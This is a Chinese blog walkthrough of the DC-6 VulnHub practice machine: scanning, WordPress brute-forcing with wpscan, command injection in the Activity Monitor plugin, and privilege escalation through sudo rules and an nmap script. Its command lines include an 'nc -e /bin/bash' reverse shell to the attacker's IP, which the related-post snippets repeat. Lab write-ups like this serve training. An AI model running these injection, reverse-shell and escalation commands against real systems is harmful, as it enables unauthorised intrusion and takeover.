DC-6 writeup

最新推荐文章于 2024-10-18 19:00:00 发布
最新推荐文章于 2024-10-18 19:00:00 发布
阅读量264 收藏 3
点赞数 2
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64272648/article/details/141329402
版权

DC-6渗透过程(kali IP:192.168.229.132 靶机IP:192.168.229.154)

**一.信息收集**
nmap -sP 192.168.229.0/24
nmap -sV -p- 192.168.229.154
dirsearch -u 192.168.229.154

得到信息:CMS:worapress 5.1.1  wordpressthemes:twenty seventeen  中间件:apache 2.4.25  语言:PHP  数据库:MySQL

**二.漏洞查找与利用**
wpscan --url wordy -e u    //爆破用户名,并把结果复制到test1
zcat /usr/share/wordlists/rockyou.txt.gz | grep k01 > test    //根据官方提示密码包含k01能节省很多时间
wpscan --url -U test1 -P test    //爆破出来一个用户名密码mark / helpdesk01,登录进去看看
0.0.0.0 & ls     //找了一下发现activity monitor 里的tools 可以任意命令执行,用burp抓包到重放器
0.0.0.0 & nc -e /bin/bash 192.168.229.132 8888    //用nc连接虚拟shell到kali

**三.提权**
cat /etc/issue
uname -a    //查看发行版本,内核信息没有发现可以利用的|
find / -perm -u=s -type f 2>/dev/null    //查看哪些有suid权限,也发现没有可用的,则从用户入手
cd /home
ls
cd mark
ls
cd stuff
ls
cat things*    //查看mark里面的信息,发现里面有graham的密码GSo7isUM1D4,用kali连接
ssh graham@192.168.229.154
sudo -l    //发现能以jens执行/home/jens/backups.sh,可以利用这个文件切换成jens用户
cd /home/jens
echo "/bin/bash" > backups.sh
sudo -u jens ./backups.sh    //切换为jens用户了
sudo -l    //发现nmap可以以root身份执行,用nmap提权
echo "os.execute('/bin/bash')" > shell
sudo nmap --script=shell    //得到root权限
find / -name * flag.*
cat theflag.txt

Jay-wings
关注
vulnhub靶机-DC6-Writeup
liuhanzhe的专栏
12-08 358
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-6,315/ DESCRIPTION DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn’t an overly difficult challenge so should be great for be
vulnhub靶机-DC1-Writeup
liuhanzhe的专栏
12-08 1182
vulnhub靶机-DC1-writeup
VulnHub DC-1 Writeup
末初的CSDN博客
09-28 431
DC-1详情见:https://www.vulnhub.com/entry/dc-1,292/ 靶机环境VirtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.102 攻击机环境VMware,桥接模式,桥接至VirtualBox Host-Only网卡,IP为:192.168.56.177 Nmap扫描C段内存活主机 nmap -sP 192.168.56.1/24 如果觉得速度慢了的话可以使用 arp-scan -l 发现目标靶机IP:192.1
VulnHub DC-2 Writeup
末初的CSDN博客
09-28 403
DC-2详情见:https://www.vulnhub.com/entry/dc-2,311/ 靶机环境VIrtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.103 攻击机环境VMware,桥接模式,桥接至VIrtualBox Host-Only网卡,IP为:192.168.56.177 扫描C段内存活主机 arp-scan -l or nmap -sP 192.168.56.1/24 访问http://192.168.56.103发现被重定向到了
DC-5 writeup
qq_64272648的博客
08-19 439
用burpsuite爆破文件包含名/thankyou.php?file=/etc/nginx/nginx.conf //先看一下nginx的配置文件看日志文件开放没有,可能会有日志文件包含,发现有两个日志文件,这里可以看错误日志文件/var/log/nginx/error.log /thankyou.php?file=/var/log/nginx/error.log&1=nc -e /bin/bash 192.168.229.132 8888 //在kali上开启监听,连接虚拟shell。
DC-1 writeup
qq_64272648的博客
08-19 647
/得到两个用户,admin,Fred,密码加密可以尝试修改密码(新添一个用户,密码记住,然后把加密后的密码拷到admin的密码里),这里查看资料知道加密脚本是用php写的并且还能用php加参数运行,直接得到加密后的密码 cat /var/www/scripts/password-hash.sh php /var/www/scripts/password-hash.sh 123456 //得到加密后的密码 mysql -udbuser -pR0ck3t use drupaldb;
DC-2 writeup
qq_64272648的博客
08-19 442
cat /usr/share/exploitdb/exploits/multiple/webapps/47690.md //发现给了一个有漏洞的url,export PATH=$PATH:/usr/bin/ //这里用vi逃逸rbash su jerry //根据提示去jerry的家目录找找。echo /home/tom/usr/bin/* //查看上面得到的path路径的所有文件,发现可用,用less,ls,scp,vi。/bin/bash //获得root权限。
DC-9 writeup
qq_64272648的博客
08-19 346
file=../../../../../etc/knockd.conf //前面扫端口发现ssh协议端口不是开放状态,可能是开启了knock服务查看一下有无配置文件,还真有用nc“敲门”§ §=../../../../../etc/passwd //burp抓包,用fuzz里的参数字典爆破出为file,还发现这里的用户和开始sq爆破出来的一样,可能是主机用户的账号密码。sudo -l //发现/opt/devstuff/dist/test/test可用以root命令执行。
DC-7 writeup
qq_64272648的博客
08-19 140
drush upwd admin --password="123456" //修改admin的密码,登录进去看看,发现content板块可以写入html文件,但不能写入php文件,收集信息发现可以新增php模块,把这个url写到那个添加链接中https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz。ls -l //发现www-data有写入和执行权限但dcuser没有,则我们要尝试找到www-data的权限。**一.信息收集**
DC-3 writeup
qq_64272648的博客
08-19 378
登录进入后台,发现有文件上传点,上传反弹shell文件(文件见主机渗透文件夹),再用netcat 开启监听,再访问上传的shell的网站路径(配合前面的web目录扫描及网站上面的信息推断出上传的位置),得到一个虚拟shell。cat /usr/share/exploitdb/exploits/linux/local/39772.txt //查看文件,最后给出了exp下载地址。locate /linux/local/39772.txt //查看完整路径。**四.Linux提权**
vulnhub靶机-DC7-Writeup
liuhanzhe的专栏
12-09 1590
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-7,356/ DESCRIPTION DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn’t an overly technical challenge, it isn’t exactly e
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 646
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
ichunqiu云境 - Delegation Writeup
WUfagg的博客
12-10 926
一场内网渗透
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8508
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网数中心举办CISAW安全软件教师培训 助力国家网络安全战略
qq_44969472的博客
10-15 386
他强调,CISAW安全软件人员认证应立足我国软件安全开发的特色,以服务国家网络安全战略布局为核心,通过认证结果不断带动人员能力提升,聚焦行业需求、热点和难点问题,进一步完善创新发展体系。我们相信,随着CISAW认证体系的不断完善和发展,必将为我国信息安全领域输送更多优秀的人才,助力国家信息安全事业迈上新的台阶。这一环节得到了大家的一致好评,许多教师表示,通过实际操作,他们不仅巩固了所学知识,还获得了更多的实战经验。他表示,通过这次培训,大家不仅学到了最新的技术和理念,更重要的是,明确了未来努力的方向。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1215
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年网络安全进阶手册:三个月黑客技术自学路线
2401_85027336的博客
10-12 1205
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年网络安全(黑客技术)三个月自学手册
最新发布
csbDD的博客
10-18 507
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络攻击的新趋势:勒索软件与零日漏洞
A526847的博客
10-12 1043
随着数字化技术的飞速发展网络攻击的新趋势:勒索软件与零日漏洞,网络攻击的形式也在不断演变。近年来,勒索软件和零日漏洞已成为网络攻击中的两大新趋势,给个人、企业和政府机构带来了巨大的安全威胁。本文将深入探讨这两种网络攻击手段的特点、危害以及防范措施。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值